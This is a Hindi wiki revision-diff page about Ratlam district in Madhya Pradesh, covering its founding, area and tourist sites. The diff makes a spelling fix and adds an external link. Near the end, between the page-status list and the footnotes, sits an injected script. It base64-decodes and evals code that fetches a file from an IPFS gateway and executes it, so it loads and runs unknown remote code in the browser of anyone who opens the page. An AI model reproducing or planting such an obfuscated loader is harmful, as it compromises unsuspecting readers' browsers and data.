Difference between revisions of "रतलाम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " जिले " to " ज़िले ")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
 
[[मालवा |मालवा क्षेत्र]] के उत्तर पश्चिम में स्थित रतलाम [[मध्य प्रदेश]] का प्रमुख ज़िला माना जाता है। इस नगर की स्थापना 'कैप्टन बोर्थविक' ने 1829 में की थी।  
 
[[मालवा |मालवा क्षेत्र]] के उत्तर पश्चिम में स्थित रतलाम [[मध्य प्रदेश]] का प्रमुख ज़िला माना जाता है। इस नगर की स्थापना 'कैप्टन बोर्थविक' ने 1829 में की थी।  
 
*रतलाम ज़िले का गठन [[1948]] में हुआ और इसे [[1949]] में मान्यता मिली।  
 
*रतलाम ज़िले का गठन [[1948]] में हुआ और इसे [[1949]] में मान्यता मिली।  
*4861 वर्ग किमी. में फैले इस जिले में कालिका माता मंदिर, बिलपाकेश्वर और शिव मंदिर प्रमुख दर्शनीय स्थल हैं।  
+
*4861 वर्ग किमी. में फैले इस ज़िले में कालिका माता मंदिर, बिलपाकेश्वर और शिव मंदिर प्रमुख दर्शनीय स्थल हैं।  
 
*इनके अलावा सैलाना का कैक्टस गार्डन, जाओरा और सैलाना के निकट खरमोर का पक्षी अभ्यारण्य देखने के लिए भी लोगों का नियमित आना जाना लगा रहता है।<ref>{{cite web |url=http://www.yatrasalah.com/photogallary.aspx?gallery=421|title=रतलाम|accessmonthday=4 सितम्बर|accessyear=2012|last= |first= |authorlink= |format= |publisher= |language=हिंदी}}</ref>
 
*इनके अलावा सैलाना का कैक्टस गार्डन, जाओरा और सैलाना के निकट खरमोर का पक्षी अभ्यारण्य देखने के लिए भी लोगों का नियमित आना जाना लगा रहता है।<ref>{{cite web |url=http://www.yatrasalah.com/photogallary.aspx?gallery=421|title=रतलाम|accessmonthday=4 सितम्बर|accessyear=2012|last= |first= |authorlink= |format= |publisher= |language=हिंदी}}</ref>
  
Line 10: Line 10:
  
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
*[http://www.ratlam.nic.in/ आधिकारिक वेबसाइट]
  
 
==संबंधित लेख==
 
==संबंधित लेख==

Latest revision as of 13:53, 1 November 2014

malava kshetr ke uttar pashchim mean sthit ratalam madhy pradesh ka pramukh zila mana jata hai. is nagar ki sthapana 'kaiptan borthavik' ne 1829 mean ki thi.

  • ratalam zile ka gathan 1948 mean hua aur ise 1949 mean manyata mili.
  • 4861 varg kimi. mean phaile is zile mean kalika mata mandir, bilapakeshvar aur shiv mandir pramukh darshaniy sthal haian.
  • inake alava sailana ka kaiktas gardan, jaora aur sailana ke nikat kharamor ka pakshi abhyarany dekhane ke lie bhi logoan ka niyamit ana jana laga rahata hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. ratalam (hiandi). . abhigaman tithi: 4 sitambar, 2012.

bahari k diyaan

sanbandhit lekh